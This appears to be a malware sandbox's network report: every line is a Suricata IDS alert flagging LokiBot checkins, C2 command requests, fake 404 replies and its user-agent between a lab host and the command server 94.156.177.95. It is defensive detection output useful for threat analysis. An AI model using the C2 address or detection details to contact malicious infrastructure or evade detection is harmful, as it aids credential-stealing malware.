Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49862 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49897
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50056
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49976 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49952 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50024
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50032 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50032 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49952 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49976 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49885 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50028
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50044
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49915 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49901 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50032 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49976 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49976 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50042
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49947 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49959 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49965 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50054 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50054 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50054 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49952 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49965 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49931 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49991 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50054 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49952
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49991 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50054 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49959 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49931 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50057 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50032 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49901 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49976
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49862
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49991 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50027
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49965 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50057 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49931 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50036 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49885 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50032 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49901 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49885 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49959
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50051 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50051 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50051 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49931 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49931 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50036 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50031 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49915 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49965
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49915 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50057 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49931
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50032
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50057 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50057 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50045 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49901 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50045 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50054
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49901 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50036 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50051 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50051 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49991 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50045 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49991 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49885 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50031 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49885 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50031 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50036 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50036 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50031 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50045 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50031 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49991
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50037 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50037 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50037 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50006 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50006 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50006 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50037 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50037 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50046 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49915 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49947 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50045 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50046 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50037
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49915 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50046 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49901
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50031
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50051
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50036
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49947
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50055 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50045
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50006 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50006 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49885
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50048 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50046 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50048 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50048 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50046 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49915
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50055 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50055 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50048 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50057
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50048 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50055 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50006
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49920 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50055 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49920 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50047 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50048
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49920 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50046
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49971 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50047 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50055
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50047 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49920 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50023 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50052 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49920 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49971 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49971 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50023 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50047 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50023 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50047 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50052 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50052 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49971 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50047
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50034 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49971 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49920
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50052 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50023 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50023 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50023
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50052 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50034 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50034 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49971
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50052
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50034 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50034 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50039 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50039 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50039 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50034
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50039 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50039 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49984 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49984 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49984 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50039
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50050 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50050 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50050 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50050 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50050 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49984 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49984 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49984
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50050
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50025 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50025 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50025 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50025 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50025 -> 94.156.177.95:80
